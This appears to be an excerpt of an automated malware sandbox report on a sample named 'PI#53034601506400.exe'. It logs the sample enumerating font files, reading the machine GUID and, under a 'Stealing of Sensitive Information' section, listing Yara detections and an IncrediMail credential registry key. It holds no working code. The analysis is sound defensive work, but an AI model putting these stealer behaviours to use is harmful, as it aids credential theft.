              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography | MachineGuid

              Stealing of Sensitive Information

Source: Yara match | File source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PI#53034601506400.exe PID: 5988, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: PI#53034601506400.exe PID: 2312, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
